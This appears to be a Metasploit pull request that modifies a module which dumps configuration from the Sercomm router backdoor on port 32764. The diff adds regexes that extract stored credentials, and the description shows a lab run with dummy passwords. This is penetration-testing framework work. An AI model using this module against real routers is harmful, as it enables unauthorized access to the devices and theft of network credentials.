### PR TITLE
REVIEW 2878

### DIFF
--- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
@@ -14,8 +14,14 @@ class Metasploit3 < Msf::Auxiliary
   SETTINGS = {
     'Creds' => [
       [ 'HTTP Web Management', { 'user' => /http_username=(\S+)/i, 'pass' => /http_password=(\S+)/i } ],
+      [ 'HTTP Web Management', { 'user' => /login_username=(\S+)/i, 'pass' => /login_password=(\S+)/i } ],
       [ 'PPPoE', { 'user' => /pppoe_username=(\S+)/i, 'pass' => /pppoe_password=(\S+)/i } ],
+      [ 'PPPoA', { 'user' => /pppoa_username=(\S+)/i, 'pass' => /pppoa_password=(\S+)/i } ],
       [ 'DDNS', { 'user' => /ddns_user_name=(\S+)/i, 'pass' => /ddns_password=(\S+)/i } ],
+      [ 'CMS', {'user' => /cms_username=(\S+)/i, 'pass' => /cms_password=(\S+)/i } ], # Found in some cameras
+      [ 'BigPondAuth', {'user' => /bpa_username=(\S+)/i, 'pass' => /bpa_password=(\S+)/i } ], # Telstra
+      [ 'L2TP', { 'user' => /l2tp_username=(\S+)/i, 'pass' => /l2tp_password=(\S+)/i } ],
+      [ 'FTP', { 'user' => /ftp_login=(\S+)/i, 'pass' => /ftp_password=(\S+)/i } ],
     ],
     'General' => [
       ['Wifi SSID', /wifi_ssid=(\S+)/i],

--- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
@@ -185,33 +185,34 @@ class Metasploit3 < Msf::Auxiliary
 
     configs.each do |config|
       parse_general_config(config)
-      parse_auth_config(config)
     end
+    parse_auth_config(configs)
   end
 
   def parse_general_config(config)
     SETTINGS['General'].each do |regex|
       if config.match(regex[1])
         value = $1
-        print_status("#{regex[0]}: #{value}")
+        print_status("#{peer} - #{regex[0]}: #{value}")
       end
     end
   end
 
-  def parse_auth_config(config)
+  def parse_auth_config(configs)
     SETTINGS['Creds'].each do |cred|
       user = nil
       pass = nil
 
       # find the user/pass
-      if config.match(cred[1]['user'])
-        user = $1
+      u = configs.grep(cred[1]['user']) { $1 }
+      if u.any?
+        user = u[0]
       end
-      if config.match(cred[1]['pass'])
-        pass = $1
+      p = configs.grep(cred[1]['pass']) { $1 }
+      if p.any?
+        pass = p[0]
       end
 
-      # if user and pass are specified, report on them
       if user and pass
         print_status("#{peer} - #{cred[0]}: User: #{user} Pass: #{pass}")
         auth = {
@@ -225,6 +226,7 @@ class Metasploit3 < Msf::Auxiliary
         }
         report_auth_info(auth)
       end
+
     end
   end
 

--- a/modules/auxiliary/admin/misc/sercomm_dump_config.rb
+++ b/modules/auxiliary/admin/misc/sercomm_dump_config.rb
@@ -64,8 +64,7 @@ class Metasploit3 < Msf::Auxiliary
 
   def run
     print_status("#{peer} - Attempting to connect and check endianess...")
-    #@endianess = fingerprint_endian
-    @endianess = 'BE'
+    @endianess = fingerprint_endian
     @credentials = {}
 
     if endianess.nil?


### PR DESCRIPTION
Tried to keep the old parsing method, so not so much parsing, just keeping a hash of @credentials to store results:

Fake test:

```
msf auxiliary(sercomm_dump_config) > run

[*] 192.168.172.134:32764 - Attempting to connect and check endianess...
[+] 192.168.172.134:32764 - Big Endian device found...
[*] 192.168.172.134:32764 - Attempting to connect and dump configuration...
[*] 192.168.172.134:32764 - Router configuration dump stored in: /Users/juan/.msf4/loot/20140114165903_default_192.168.172.134_router.config_839452.txt
[*] 192.168.172.134:32764 - Wifi SSID: NETGEAR
[*] 192.168.172.134:32764 - HTTP Web Management: User: admin Pass: asdfadfs
[*] 192.168.172.134:32764 - PPPoA: User: asdfadfs@asdfadfs Pass: asdfadfs
[*] Auxiliary module execution completed
msf auxiliary(sercomm_dump_config) > creds

Credentials
===========

host             port   user                          pass       type      proof  active?
----             ----   ----                          ----       ----      -----  -------
192.168.172.134  32764  asdfadfs  asfddfsa  password         true
192.168.172.134  32764  asdfdsafdsfa                         afsdfads    password         true

```

Please feel free to check, discuss and test on real environment. Once you feel comfortable with it, land into your repo and https://github.com/rapid7/metasploit-framework/pull/2878 will be automatically updated!
